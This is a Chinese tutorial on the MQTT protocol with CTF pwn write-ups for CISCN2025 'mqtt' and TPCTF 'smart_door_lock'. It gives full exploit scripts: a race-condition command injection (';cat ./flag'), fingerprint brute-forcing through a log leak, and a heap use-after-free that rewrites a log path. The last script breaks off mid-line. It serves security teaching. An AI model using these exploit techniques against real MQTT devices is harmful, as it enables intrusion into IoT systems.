MQTT讲解
MQTT(Message Queuing Telemetry Transport,消息队列遥测传输协议),是一种基于发布/订阅(publish/subscribe)模式的“轻量级”通讯协议,该协议构建于TCP/IP协议上,由IBM在1999年发布。
MQTT最大优点在于,用极少的代码和有限的带宽,为连接远程设备提供实时可靠的消息服务。
作为一种低开销、低带宽占用的即时通讯协议,使其在物联网、小型设备、移动应用等方面有较广泛的应用。
协议原理
实现MQTT协议需要客户端和服务器端通讯完成,在通讯过程中,MQTT协议中有三种身份:发布者(Publish)、代理(Broker)(服务器)、订阅者(Subscribe)。其中,消息的发布者和订阅者都是客户端,消息代理是服务器,消息发布者可以同时是订阅者。
MQTT传输的消息分为:主题(Topic)和负载(payload)两部分:
(1)Topic,可以理解为消息的类型,订阅者订阅(Subscribe)后,就会收到该主题的消息内容(payload);
(2)payload,可以理解为消息的内容,是指订阅者具体要使用的内容。
发布者 (Publisher)
功能: 负责产生数据和消息,并将这些指定topic的消息发送(发布/Publish)到 Broker。
代理/服务器(broker)
可以理解为提供 mqtt 服务的代理服务器 ,通俗一点来讲就是”邮局”或者说是”消息中转中心”,每个 client 之间的通信都必须通过 Broker 来进行。
简单来说,Broker就是一个中间人,负责管理所有客户端的连接,并确保消息能够从一个客户端安全、高效地传递到另一个或多个客户端。
订阅者(Subscribe)
功能: 负责接收它感兴趣的消息。它会提前告诉Broker它对哪个”主题”(Topic)的消息感兴趣(这个行为叫做订阅/Subscribe),就会接收订阅相同topic的client。
客户端(Client)
客户端可以充当发布者,也可以充当订阅者,也可以同时充当两个角色
Client 是指任何连接到 Broker 的设备或应用程序 ,可以理解为”寄信人”和”收信人”。在物联网场景中,一个 Client 可以是一个温度传感器、一个智能灯泡、一部手机上的App,或者是一个在服务器上运行的数据分析程序。
示意图
client1,2,3,4同时连接broker,client1,2,3订阅topic”diag” ,这时client4发送topic为”diag” msg=”hello”给broker,broker会向同时订阅topic=”diag”的client1,2,3发送这个消息(图源:[原创]mqtt 协议pwn入门(ciscn2025 final mqtt)-Pwn-看雪论坛-安全社区|非营利性质技术交流社区)

环境配置
1.使用安装 Mosquitto MQTT
sudo apt update
sudo apt install mosquitto mosquitto-clients
2.启动服务并设置开机自启
sudo systemctl enable mosquitto
sudo systemctl start mosquitto
3.配置conf
sudo vim /etc/mosquitto/mosquitto.conf
在文件中添加
listener 1883 #设置监听端口为 1883
allow_anonymous true # 可选,允许匿名访问(默认)
摁“Esc”+“:wq”退出后终端输入
sudo systemctl restart mosquitto # 重启服务

netstat -lnvp查看一下,可以看到1883端口已经开始监听

下载mqttx

点击新建连接,我这里是wsl启动的,但是监听了所有ip的端口,所以ip直接填0.0.0.0

添加一个订阅

利用终端进行连接测试
终端输入
mosquitto_pub -h localhost -t testtopic -m "Hello MQTT"
可以看到在客户端已经收到了消息

终端输入
mosquitto_sub -h localhost -t testtopic
用来订阅这个消息,在客户端输入主题testtopic

发送之后,在客户端和终端界面均可以看到刚才发的消息

python使用mqtt
pip install paho-mqtt
发送端
# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-
import paho.mqtt.client as mqtt
import time
def on_connect(client, userdata, flags, rc):
print("链接")
print("Connected with result code: " + str(rc))
def on_message(client, userdata, msg):
print("消息内容")
print(msg.topic + " " + str(msg.payload))
# 订阅回调
def on_subscribe(client, userdata, mid, granted_qos):
print("订阅")
print("On Subscribed: qos = %d" % granted_qos)
pass
# 取消订阅回调
def on_unsubscribe(client, userdata, mid, granted_qos):
print("取消订阅")
print("On unSubscribed: qos = %d" % granted_qos)
pass
# 发布消息回调
def on_publish(client, userdata, mid):
print("发布消息")
print("On onPublish: qos = %d" % mid)
pass
# 断开链接回调
def on_disconnect(client, userdata, rc):
print("断开链接")
print("Unexpected disconnection rc = " + str(rc))
pass
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_disconnect = on_disconnect
client.on_unsubscribe = on_unsubscribe
client.on_subscribe = on_subscribe
client.connect('127.0.0.1', 1883, 600) # 600为keepalive的时间间隔
while True:
client.publish(topic='testtopic', payload='amazing', qos=0, retain=False)
time.sleep(2)


接收端
# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-
import paho.mqtt.client as mqtt
import time
def on_connect(client, userdata, flags, rc):
print("链接")
print("Connected with result code: " + str(rc))
def on_message(client, userdata, msg):
print("消息内容")
print(msg.topic + " " + str(msg.payload))
# 订阅回调
def on_subscribe(client, userdata, mid, granted_qos):
print("订阅")
print("On Subscribed: qos = %d" % granted_qos)
pass
# 取消订阅回调
def on_unsubscribe(client, userdata, mid, granted_qos):
print("取消订阅")
print("On unSubscribed: qos = %d" % granted_qos)
pass
# 发布消息回调
def on_publish(client, userdata, mid):
print("发布消息")
print("On onPublish: id = %d" % mid)
pass
# 断开链接回调
def on_disconnect(client, userdata, rc):
print("断开链接")
print("Unexpected disconnection rc = " + str(rc))
pass
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_disconnect = on_disconnect
client.on_unsubscribe = on_unsubscribe
client.on_subscribe = on_subscribe
client.connect('127.0.0.1', 1883, 600) # 600为keepalive的时间间隔
client.subscribe('testtopic', qos=0)
client.loop_forever() # 保持连接


例题讲解
CISCN2025——final mqtt
题目分析


程序首先会读取两个文件,如果文件不存在则直接退出
所以首先需要创建两个文件

接着会创建一个mqtt客户端,但是这里要求broker的监听端口是9999,所以我们需要改一下端口,修改方式上文说过

成功启动服务

首先程序会在订阅的diag主题中接受auth,cmd,arg三个参数,而且arg参数存放在bss段上

在start_routine函数中,会首先进行一个认证

认证的逻辑就是将接收到的VIN码转成十六进制(其实就是在考察mqtt接受数据),不多赘述了
随后根据cmd值,可以调用set_vin命令

这里有一个很明显的命令注入,src就是我们刚才的arg参数
popen函数会执行s的命令,由于是“r”参数,所以他会将命令执行的结果传入管道,在fread的时候读到ptr+5的位置,然后利用mqttsend函数发送给broker

但是执行命令之前,会有一个check函数,这个函数不细看了,功能就是只允许命令中有数字或字母出现,这就导致命令注入无法输入符号而不成功
但是由于检查完之后到执行命令之前,子进程会执行一个sleep(2)的函数,于是在这个期间我们就可以再次发送消息,修改arg为命令注入的参数,这当然绕不过check的检查,但是在上一个子进程休眠两秒结束后,我们的命令已经被修改了,于是就可以执行命令注入了
exp
#! /usr/bin/python3
import random
from pwn import *
import time
import paho.mqtt.client as mqtt
import json
context(log_level = "debug",os = "linux",arch = "amd64")
pwnFile = "./pwn"
libcFile = "./libc.so.6"
ip = "127.0.0.1"
local = ""
local_port = 9999
port = 9999
elf = ELF(pwnFile)
libc = ELF(libcFile)
def publish(client,topic,auth,cmd,arg):
msg = {
"auth":auth,
"cmd":cmd,
"arg":arg
}
result = client.publish(topic = topic, payload = json.dumps(msg))
print(json.dumps(msg))
print(result)
return result
def on_connect(client, userdata, flags, rc):
client.subscribe("vehicle_diag")
client.subscribe("diag")
client.subscribe("#") # 订阅所有
client.subscribe("diag/resp")
print("Connected with result code " + str(rc))
def on_subscribe(client,userdata,mid,granted_qos):
print("消息发送成功")
def on_message(client, userdata, msg):
message = msg.payload.decode()# Decode message payload
print(f"Received message on topic '{msg.topic}': {message}")
# try:
# data = json.loads(message) # 解析为字典
# dest = data.get("vin") # 获取vin字段
# log.success("dest -> "+ dest)
# except json.JSONDecodeError:
# print("JSON解析失败")
print(message)
def sum2hex(dest):
v3 = 0
for i in range(len(dest)):
v3 = (0x1f * v3 + ord(dest[i])) & 0xffffffff
log.success(f"sum2hex -> {v3:08x}")
return f"{v3:08x}"
#gdb.attach(io,'b *$rebase(0x1EC0)')
topic = "diag"
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_subscribe = on_subscribe
client.connect(host = "127.0.0.1",port = 9999,keepalive=10000)
auth = sum2hex("hahaha\n")#这里是你自己接收到的VIN码
publish(client,"diag",auth,"set_vin","111111111111")
sleep(0.5)
publish(client,"diag",auth,"set_vin",";cat ./flag")
publish(client,"diag",auth,"set_vin",";cat ./flag")
sleep(1)
client.loop_start()
打通截图

TPCTF——smart_door_lock
题目已开源TPCTF2025/pwn-smart-door-lock at main · tp-ctf/TPCTF2025 · GitHub
题目附件是抹了符号表的静态编译,总之如果让我来直接逆向这个程序,我能逆一年,所以仅从复现学习的角度,我们先来学习源码,在对应到IDA里逆向吧,不得不说抹了符号表确实给这个题增加了太多难度
本题exp学习自TPCTF 2025 Writeup by Nepnep
源码学习
main.cpp

main.cpp里核心就是调用了mqtt_lock这个函数,其他的都不重要,都是初始化和结束回收资源函数等等,我们不多关注了
door_lock.h

这里面首先定义了指纹结构体和门锁开关状态结构体,指纹结构体包含指纹信息,下一个指针(很明显是个链表),指纹的id和重试次数,门锁状态定义了开/关两种状态以及操作的时间戳。

其次定义了mqtt_lock函数(核心),以及其他一些mqtt回调函数,还有指纹链表(finger_list),以及本题的关键——logger这个文件,还有其他若干函数和参数,不多解释了,接下来的函数分析会提到
door_lock.cpp

这是一个处理json数据的辅助函数,在这个题中不涉及漏洞和核心逻辑,不多分析了
贴AI的解释


时间戳,不多说

大白话就是把输入的字符串形式的指纹数据提取成int数组

这里限制了指纹数据只能是数字,如果是其他的,比如字母,就会直接返回空指针,这里比较重要,后面要考,划重点
mqtt_lock::mqtt_lock(const char *id, const char *host, int port) : mosqpp::mosquittopp(id)
{
/* set connection */
int keepalive = 60;
tls_opts_set(1,"tlsv1",NULL);
tls_set("/etc/mosquitto/certs/ca.crt",NULL,NULL,NULL,NULL);
tls_insecure_set(true);
connect(host, port, keepalive);
/* inital session & token */
session_id = NULL;
auth_token = NULL;
/* set lock inital */
lock_door();
/* open logger create read write */
strcpy(log_file,"/etc/mosquitto/smart_lock.log");
logger = fopen(log_file, "w+");
if (logger == NULL) {
printf("Error opening file!\n");
exit(1);
}
int status = log("logger created:%s\n",log_file);
/* read fingers */
FILE* finger_file = fopen("/etc/mosquitto/fingers_credit","r");
if (finger_file == NULL) {
printf("Error opening file!\n");
exit(1);
}
char line[512];
fingers *finger_pos = NULL;
max_finger_id = 1;
while (fgets(line, sizeof(line), finger_file)) {
line[strcspn(line, "\n")] = 0;
struct fingers *new_finger = (struct fingers*)malloc(sizeof(struct fingers));
new_finger->finger_id = max_finger_id++;
new_finger->next = NULL;
new_finger->retry_count = 0;
if (new_finger == NULL) {
log("Error allocating memory!\n");
exit(1);
}
if (finger_list == NULL)
{
finger_list = new_finger;
finger_pos = new_finger;
} else {
finger_pos->next = new_finger;
finger_pos = new_finger;
}
if( edit_finger(new_finger,(char*)line)){
continue;
}
else {
free(new_finger);
continue;
}
}
fclose(finger_file);
/* inital subscribe*/
subscribe(NULL, "auth_token");
subscribe(NULL, "manager");
subscribe(NULL, "logger");
};
敲重点了!

首先初始化tls证书,session_id,auth_token,和mqtt的服务器(broker)进行连接

其次设置门锁状态为锁门,同时打开日志文件
这里初始化了logger(FILE类型),最终这个指针会存放在堆上,而本题的堆地址是固定值
为什么?

这是qemu虚拟机的结果

懂了吗?

这是我wsl的结果,所以这个系统ALSR随机化保护开的比较低,堆地址是固定的

接着从/etc/mosquitto/fingers_credit读出一个指纹数据(实则是长度为20的int数组),然后再程序中初始化一下指纹链表


最后订阅了这三个主题

mqtt_lock的析构函数

add函数,对应的堆题中的增函数,是一个比较经典的链表增添堆块类型,有个很明显的uaf,如果edit失败,new_finger这个指针会被free但是还在指针链表中

edit函数,format_finger为空指针,就会返回false,而这里根据前面对change_finger_format函数的分析,只要指纹数据里有字母,就会edit失败
由此可以利用uaf漏洞

remove操作,对应堆题中的删函数,操作没有什么漏洞

check_finger函数,这里会计算指纹的相似度,然后存放到日志中,后面有可以读取日志的操作,所以存在信息泄露,由此我们可以猜测出远端的指纹信息,具体exp如下
import paho.mqtt.client as mqtt
from time import sleep
import ssl
import re
import time
import random
# MQTT Broker Configuration
BROKER = "127.0.0.1"
PORT = 8883
CAFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/ca.crt"
CERTFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.crt"
KEYFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.key"
YELLOW = "\033[93m"
BLUE = "\033[94m"
END = "\033[0m"
auth_token_topic = "auth_token"
valid_token_topic = "validtoken123123"
logfile_topic = "logfile"
logger_topic = "logger"
fingerprint_array = [0] * 20 # 初始化数组,包含20个0
def extract_similarity_from_eof(log_messages):
"""从日志列表中提取 EOF 上一行的相似度百分比。"""
if len(log_messages) < 2:
return None
eof_index = len(log_messages) - 1
second_last_message = log_messages[eof_index - 1]
match = re.search(r"finger similarity:%([\d\.]+)", second_last_message)
return float(match.group(1)) if match else None
def on_message(client, userdata, msg):
"""回调函数,用于处理接收到的消息。"""
userdata.append(msg.payload.decode())
def perform_bruteforce():
results = []
# 设置订阅者以监听日志
print("[DEBUG] Setting up MQTT client for subscription...")
client = mqtt.Client(userdata=results)
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE, cert_reqs=ssl.CERT_NONE)
client.tls_insecure_set(True)
client.on_message = on_message
client.connect(BROKER, PORT, 60)
client.subscribe(logfile_topic)
client.loop_start()
# 验证 Token
print("[DEBUG] Publishing authentication token...")
client.publish(auth_token_topic, "validtoken123123")
time.sleep(2)
fingerprint_array = [0] * 20
random_array = [0] * 20
for i in range(20):
print(f"[DEBUG] Starting binary search for index {i}...")
left, right = 1, 2 ** 31 - 1 # 设置最大值为 2^31 - 1
while True: # 修改为基于相似度的条件
random_array[i] = random.randint(left, right) # 随机选择一个值
real_array = fingerprint_array.copy()
payload = f"[{','.join(map(str, random_array))}]"
print(f"[DEBUG] Publishing guess for index {i}: {payload}")
client.publish(valid_token_topic, payload)
time.sleep(0.5)
# 请求日志
print(f"[DEBUG] Requesting log data...")
client.publish(logger_topic, "download")
time.sleep(0.5)
# 等待相似度响应
if len(results) >= 2: # 确保有足够的消息提取 EOF 上一行
similarity = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: {YELLOW}{random_array[i]}{END} : {BLUE}{similarity}{END}")
if similarity is None:
print("[DEBUG] No similarity data found, retrying...")
continue
P = similarity * 20 / 100
x1 = int(P * random_array[i])
x2 = int(random_array[i] // P)
# 两个分别发送一下看看比例
print(x1, x2)
real_array[i] = x1
client.publish(valid_token_topic, f"[{','.join(map(str, real_array))}]")
print(f"[DEBUG] Publishing guess for index {i}: {real_array}")
client.publish(logger_topic, "download")
sleep(1)
similarity1 = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: x1:{YELLOW}{x1}{END} : {BLUE}{similarity1}{END}")
real_array[i] = x2
client.publish(valid_token_topic, f"[{','.join(map(str, real_array))}]")
print(f"[DEBUG] Publishing guess for index {i}: {real_array}")
client.publish(logger_topic, "download")
sleep(1)
similarity2 = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: x2:{YELLOW}{x2}{END} : {BLUE}{similarity2}{END}")
if similarity1 > similarity2:
fingerprint_array[i] = x1
similarity = similarity1
else:
fingerprint_array[i] = x2
similarity = similarity2
random_array[i] = 0
if similarity >= 4.75 * (i + 1):
print(f"[DEBUG] Target similarity reached: {similarity} >= {4.75 * (i + 1)}")
break # 达到目标相似度时结束循环
client.loop_stop()
client.disconnect()
print("Final fingerprint array:", fingerprint_array)
# fingerprint_array的逗号之间不要有空格
print("Final fingerprint array:", ','.join(map(str, fingerprint_array)), end="\n")
if __name__ == "__main__":
perform_bruteforce()
原理如下:
第一次我对第一位随机发送一个数,其余全是0,程序会计算出相似度,记为S,相似比为P(min(随机数Random,真实指纹数据Real)/max(随机数Random,真实指纹数据Real))则S=(P/20)*100,由于S可以泄露,则P=(S/100)*20,则一定有Real/Random=P或者Random/Real=P,即Real=P*Random或Real=Random/P

对应这段代码
然后我们把计算出来的两个可能真实值都发一遍,看看哪个相似度更高,哪个就是真实值

最后我们还要保证总相似度达到90%,保险起见,这里设置的阈值是95%=4.75%*20

日志写入函数,不多说了

download函数,其实就是堆题中的show函数,也就是这里可以泄露日志,clear函数,就是重新打开一遍日志文件,相当于把之前的清空了

开关门函数,其实就设置了一个状态,没什么用
void mqtt_lock::on_message(const struct mosquitto_message *message)
{
if(!strcmp(message->topic, "auth_token")){
if (auth_token) {
unsubscribe(NULL, auth_token);
// log("close subncribe:%s\n",auth_token);
free(auth_token);
}
auth_token = (char*)malloc(0x11);
char * payload = (char*)message->payload;
for (int i = 0; i<0x10;i++) {
if ((payload[i] <= '9' && payload[i] >= '0') || (payload[i] <= 'Z' && payload[i] >= 'A') || (payload[i] <= 'z' && payload[i] >= 'a')) {
auth_token[i] = payload[i];
} else {
log("auth_token error: token must be num or letter\n");
free(auth_token);
auth_token = NULL;
return;
}
}
auth_token[0x10] = 0;
log("auth_token:%s\n",auth_token);
char re_auth_token[20];
snprintf(re_auth_token, 20, "re_%s", auth_token);
subscribe(NULL, auth_token);
publish(NULL, re_auth_token, 11, "finger tap\n");
// log("open subncribe:%s\n",auth_token);
return;
}
else if(!strcmp(message->topic, "manager")) {
/*
{
"session": "a1b2c3d4e5",
"request": "add_finger",
"req_args": [
"john_doe",
"password123",
]
}*/
// add_finger edit_finger remove_finger lock_door unlock_door
char *payload = (char*)message->payload;
char *session = nullptr;
char *request = nullptr;
char *req_args[2] = {nullptr, nullptr};
bool paese_res = parse_json(payload, &session, &request, req_args);
if (!paese_res) {
log("json parse error\n");
return;
}
if (!session_id || strcmp(session,session_id)) {
log("session id mismatch\n");
goto END;
}
char output[1024];
if (!strcmp(request,"add_finger")) {
if (req_args[0] && req_args[0][0]== '[' && req_args[0][strlen(req_args[0])-1] == ']') {
if (add_finger(req_args[0])) {
snprintf(output,1024,"new finger id:%d\n",max_finger_id-1);
publish(NULL,session_id,strlen(output),output);
goto END;
}
}
snprintf(output,1024,"add finger failed\n");
publish(NULL,session_id,strlen(output),output);
goto END;
}
else if (!strcmp(request,"edit_finger")) {
if(!req_args[0] || !req_args[1]) {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
if (req_args[1][0] != '[' || req_args[1][strlen(req_args[1])-1] != ']') {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
unsigned int finger_id = atoi(req_args[0]);
for (fingers * finger = finger_list; finger != NULL; finger = finger->next) {
if (finger->finger_id == finger_id) {
if (edit_finger(finger,req_args[1])) {
snprintf(output,1024,"changed finger id:%d\n",finger_id);
publish(NULL,session_id,strlen(output),output);
goto END;
} else {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
}
}
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
else if (!strcmp(request,"remove_finger")) {
if (!req_args[0]) {
publish(NULL,session_id,21,"remove finger failed\n");
goto END;
}
unsigned int finger_id = atoi(req_args[0]);
if (remove_finger(finger_id)) {
snprintf(output,1024,"removed finger id:%d\n",finger_id);
publish(NULL,session_id,strlen(output),output);
goto END;
}
else {
publish(NULL,session_id,21,"remove finger failed\n");
goto END;
}
}
else if (!strcmp(request,"lock_door")) {
if (lock_door()) {
publish(NULL,session_id,18,"lock door success\n");
goto END;
} else {
publish(NULL,session_id,17,"lock door failed\n");
goto END;
}
}
else if (!strcmp(request,"unlock_door")) {
if (unlock_door()) {
publish(NULL,session_id,20,"unlock door success\n");
goto END;
} else {
publish(NULL,session_id,19,"unlock door failed\n");
goto END;
}
}
END:
if(session) free(session);
if(request) free(request);
if(req_args[0]) free(req_args[0]);
if(req_args[1]) free(req_args[1]);
return;
}
else if(!strcmp(message->topic, "logger")) {
char * payload = (char*)message->payload;
if (!auth_token){
publish(NULL, "logfile", 15, "not authorized\n");
return;
}
if (!strcmp(payload,"download")) {
download_log();
}
else if (!strcmp(payload,"clear")) {
clear_log();
}
}
else if(auth_token && !strcmp(message->topic, auth_token)) {
char * payload = (char*)message->payload;
char re_auth_token[20];
snprintf(re_auth_token, 20, "re_%s", auth_token);
fingers* cur_finger = finger_list;
while (cur_finger != NULL) {
if (check_finger(cur_finger,payload)) {
if (session_id) {
free(session_id);
unsubscribe(NULL, session_id);
}
session_id = (char*)malloc(0x11);
for (int i = 0; i<0x10;i++) {
session_id[i] = session_nums[(rand()%62)];
}
session_id[0x10] = 0;
char output_session[0x30];
snprintf(output_session, 0x30, "login successed. session_id: %s\n", session_id);
publish(NULL, re_auth_token, strlen(output_session), output_session);
return;
}
cur_finger = cur_finger->next;
}
publish(NULL, re_auth_token, 13, "login failed\n");
}
}
本题中最重要的函数,也就是mqtt客户端接收到信息的回调函数——on_message

首先是登录处理逻辑
这里需要用户在auth_token话题自定义一个token,然后系统会订阅token这个话题,此时auth_token不再为空,如果有新的token,会将原先的覆盖掉

如果话题是logger,那么就可以查看日志文件,泄露指纹信息,这里只要求auth_token有值,所以我们只需要一开始随意登录一下就可以了

这里对应的是身份认证处理逻辑,在登录(auth_token不为空)之后,就要发送指纹信息,随后check_finger函数就会检测是否是有效指纹,如果是,则会返回一个session_id

最后是manager话题,首先这个话题会利用parse_json函数解析出session,request,req_args这三个参数,随后会比较用户发送的session_id是否和成功认证返回的session_id相一致,如果一致,则会根据request对应的请求执行增删改操作

添加指纹操作

修改指纹操作

删除指纹操作

开关门操作

其他回调函数不重要
如何调试
准备gdbserver
由于本题是arm架构,所以首先你要准备一个arm架构的gdbserver,我是直接从FirmAE里面找gdbserver了

这里我选择用python起一个http服务,通过网络进行传输
修改启动脚本
这里我们要把启动脚本修改成如下代码
qemu-system-arm -m 512 -M virt,highmem=off \
-kernel zImage \
-initrd rootfs.cpio \
-net nic \
-net user,hostfwd=tcp::8883-:8883,hostfwd=tcp::1234-:1234 \
-nographic \
-monitor null
增添一个端口映射,这里我选择是1234,用于连接gdbserver,这个端口可以随意选择
传输gdbserver
我们需要将我们wsl里面的gdbserver传到qemu虚拟机里,幸运的是qemu虚拟机里自带了wget命令,因此我们直接通过网络传输即可
wget http://172.26.25.103:8000/gdbserver.armel
mv gdbserver.armel /bin/gdbserver
chmod +x /bin/gdbserver
gdbserver附加到现有进程
ps看一下进程

gdbserver --attach :1234 63
在本机中启动gdb-multiarch,然后输入
set architecture arm
set endian little
target remote localhost:1234
set glibc 2.38
由于这题是2.38版本的堆,所以需要额外设置一下libc版本

就可以愉快的开启调试了
EXP讲解
完整EXP如下
import paho.mqtt.client as mqtt
from pwn import *
import time
from time import sleep
import ssl
import re
import json
# MQTT Broker 配置
BROKER = "0.0.0.0"
PORT = 8883
# PORT = 50806
CAFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/ca.crt"
CERTFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.crt"
KEYFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.key"
AUTH_TOKEN_TOPIC = "auth_token"
VALID_TOKEN_TOPIC = "validtoken123123"
SESSION_ID_TOPIC = "#" # 一开始订阅所有主题 (#)
mytime = 1
# 用于存储接收到的消息
received_messages = []
def pay(input_str, mylen=80):
# 如果字符串长度小于80,使用复制方式填充至80
while len(input_str) < mylen:
input_str += input_str
# 确保字符串的长度恰好为80
input_str = input_str[:mylen]
# 初始化结果数组
result = []
# 每4个字符一组
for i in range(0, len(input_str), 4):
# 取4个字符
chunk = input_str[i:i + 4]
# 将4个字符转换为对应的十六进制数字
hex_value = 0
for char in chunk:
hex_value = (hex_value << 8) + ord(char)
# 将结果添加到数组中
result.append(hex_value)
return result
def on_connect(client, userdata, flags, rc):
"""连接到 MQTT Broker 时的回调函数"""
print(f"Connected to MQTT Broker with result code {rc}")
client.subscribe(SESSION_ID_TOPIC) # 订阅所有主题 (#),获取所有消息
def on_message(client, userdata, msg):
"""接收到消息时的回调函数"""
print(f"Received message on topic {msg.topic}: {msg.payload.decode()}")
userdata.append(msg.payload.decode()) # 保存接收到的消息
def publish_message(client, topic, message):
"""发布消息到指定的 MQTT 主题"""
print(f"Publishing message to {topic}: {message}")
client.publish(topic, message, qos=1)
def send_auth_token(client):
"""发送 auth_token 消息"""
message = "validtoken123123"
publish_message(client, AUTH_TOKEN_TOPIC, message)
def send_finger_data(client):
"""发送指纹数据"""
finger_data = "[1373378270,39159,3669886736,2494,2,515555555,2945791524,9283885,155241,259,30956741,169525,4196208728,2948318370,231700,2380113,8528,1416626613,3520135119,42949672977]"
# finger_data = "[1373378309,39159,2147483775,2494,2,515555574,2147483758,9283884,155241,259,30956739,169525,2147483479,2147483548,231699,2380112,8528,1416626458,2147483496,292]"
publish_message(client, VALID_TOKEN_TOPIC, finger_data)
def extract_session_id(messages):
"""从接收到的消息中提取 session_id"""
for message in messages:
match = re.search(r"session_id\s*[:=]\s*([a-zA-Z0-9]+)", message)
if match:
return match.group(1) # 返回提取到的 session_id
return None
def convert_array_to_string(array):
"""自动将数组转换为字符串,格式为 "[\"element1\",\"element2\",...]",确保没有空格"""
return "[" + ",".join(f"{item}" for item in array) + "]"
def send_edit(client, session_id, index, payload):
"""发送 edit_finger 命令,确保 req_args 符合格式"""
req_args = [
str(index), # 第一个元素是索引,确保是字符串类型
payload,
]
json_message = {
"session": session_id,
"request": "edit_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化,确保所有字符串都用双引号包裹
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)
def send_add_command(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
payload = pay(payload, 88)
req_args = [
convert_array_to_string(payload) # 指纹数据转为字符串格式
]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)
def send_add(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)
def send_log(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "logger", "download")
sleep(mytime)
def send_malloc(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id + " aaaabaa////flagaeaaafaaagaaahaaaiaaajaaakaaalaa\x0a\x0aaaanaaaoaaapa" + "/flag" + "\x10\x00\x00\x00\x00\x00\x00",
"request": "kiddingyou",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)
def send_remove_command(client, session_id, index):
"""发送 remove_finger 命令,确保 req_args 符合格式"""
payload = pay("12345678")
req_args = [
f"{index}", convert_array_to_string(payload)
]
json_message = {
"session": session_id,
"request": "remove_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)
def main():
# 创建 MQTT 客户端实例
client = mqtt.Client(userdata=received_messages)
# 配置 SSL 连接
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)
client.tls_insecure_set(True)
# 设置回调函数
client.on_connect = on_connect
client.on_message = on_message
# 连接到 MQTT Broker
print(f"Connecting to MQTT Broker at {BROKER}:{PORT}...")
client.connect(BROKER, PORT, 60)
# 启动接收消息的循环
client.loop_start()
# 发送认证 token
send_auth_token(client)
print("\033[33mSent auth token and finger data.\033[0m")
time.sleep(mytime) # 等待消息发送
# 发送有效的指纹数据
send_finger_data(client)
print("\033[33mSent finger data.\033[0m")
time.sleep(mytime) # 等待消息发送
# 获取 session_id,监听接收到的消息
print("Waiting for session_id...")
time.sleep(mytime) # 等待一段时间来接收消息
# 提取 session_id 并根据 session_id 去订阅该 session 的主题
session_id = extract_session_id(received_messages)
# session_id="02wakqZtjQ5rDm9G"
if session_id:
print(f"Session ID received: {session_id}")
# 这里用第一个命令行参数
offset = 0
# 订阅该 session_id 主题并等待接收指纹管理相关的消息
client.subscribe(f"{session_id}")
# 取消订阅全部
client.unsubscribe(SESSION_ID_TOPIC)
time.sleep(mytime) # 等待消息
# 2 add free
send_add(client, session_id,
"[1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
pause()
# uaf 修改fd为自己-8
heap = 0x387898 + offset
xor = (heap - 8) ^ (heap >> 12)
send_edit(client, session_id, 2,
f"[{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]")
pause()
# 申请到自己3
send_add(client, session_id,
"[1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 申请到自己-8,为4
pause()
send_add(client, session_id,
"[0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 此处修改next,为日志路径
log_path = 0x35b1f0 + offset
send_edit(client, session_id, 3, f"[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]")
send_remove_command(client, session_id, 3)
send_remove_command(client, session_id, 1)
tmp1 = 0x39d8e0 + offset
tmp2 = 0x389108 + offset
tmp3 = 0x35b4d8 + offset
tmp4 = 0x399c20 + offset
tmp5 = 0x39a240 + offset
send_edit(client, session_id, 625,
